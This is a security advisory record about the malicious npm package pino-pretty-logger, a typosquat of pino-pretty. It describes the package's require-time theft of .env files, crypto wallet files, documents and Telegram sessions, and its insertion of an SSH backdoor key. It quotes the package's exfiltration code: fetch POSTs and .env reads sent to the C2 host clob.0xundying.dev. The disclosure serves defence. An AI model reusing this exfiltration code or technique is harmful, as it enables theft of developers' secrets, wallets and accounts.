VDB
GCVE-110-OSM-2026-3697
GCVE-110-OSM-2026-3697
Advisory PublishedCVSS 9.6/10
Exfiltrates environment files, crypto wallet files, and Telegram Desktop session data to attacker C2 clob.0xundying.dev at require-time, then injects a hardcoded RSA backdoor key into ~/.ssh/authorized_keys on Linux for persistent SSH access. All five exfil channels fire silently on require() with no install hook and no user interaction. Typosquats pino-pretty (5.5M weekly downloads) with 355 confirmed victim downloads.
**Trigger** (`require-time`): `dist/index.js` line 4 executes `require('./logger')`, immediately running module-level code in `dist/logger.js` — no preinstall/postinstall hook present.
**Excerpt A — exfil transport (system info)**:
`fetch(`${_srv}/api/validate/system-info`, {method:'POST', headers:{'Content-Type':'application/json'}, body: JSON.stringify({operatingSystem, ipAddress, username})})`
where `_srv` resolves to the attacker C2 base URL (`clob.0xundying.dev`), set as a literal string constant in `dist/logger.js`.
**Excerpt B — data collection (.env)**:
`const _ec = fs.readFileSync(path.join(process.cwd(), '.env'), 'utf8')` followed by POST to `/api/validate/project-env` with `{envContent: _ec, projectPath: _pp}`.
**Collection chain**:
1. `_ssi()` — collects OS platform, all IPv4 addresses (`os.networkInterfaces()`), and `os.userInfo().username`; POSTs to `https://clob.0xundying.dev/api/validate/system-info`.
2. `_spe()` — reads `process.cwd()/.env` in full; POSTs content + project path to `https://clob.0xundying.dev/api/validate/project-env`.
3. `_sejf()` + `_saf()` — recursively sweeps homedir and system paths for all `.env` files; JSON files matching 30+ crypto wallet keywords (mnemonic, seed, privatekey, metamask, phantom, exodus, trustwallet, keystore, etc.) plus numeric-named files; and documents (`.doc`, `.docx`, `.xls`, `.xlsx`, `.txt`) matching the same keyword list. All POSTed to `https://clob.0xundying.dev/api/validate/files`.
4. `_stia()` + `_ptg()` [macOS/Windows] — checks `https://clob.0xundying.dev/api/validate/tdata/check` as a dedup sentinel, then gzip-compresses the complete Telegram Desktop `tdata/` directory and streams it to `https://clob.0xundying.dev/api/validate/tdata/upload` using custom binary framing. Max 500MB upload. Enables full Telegram session hijack without the victim's password.
5. `_ark()` [Linux only] — writes hardcoded RSA-4096 public key (`user@DESKTOP-VFF5DKR`) to `~/.ssh/authorized_keys` via `fs.writeFileSync` + `fs.chmodSync(_akp, 0o600)`, creating `~/.ssh/` at mode `0o700` if absent. Grants the attacker persistent SSH backdoor access.
All five operations use `.catch(() => {})` to silently suppress errors.
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | pino-pretty-logger | — | — |
Browse GCVE Records
73,196 records in the GCVE database · Updated July 17, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.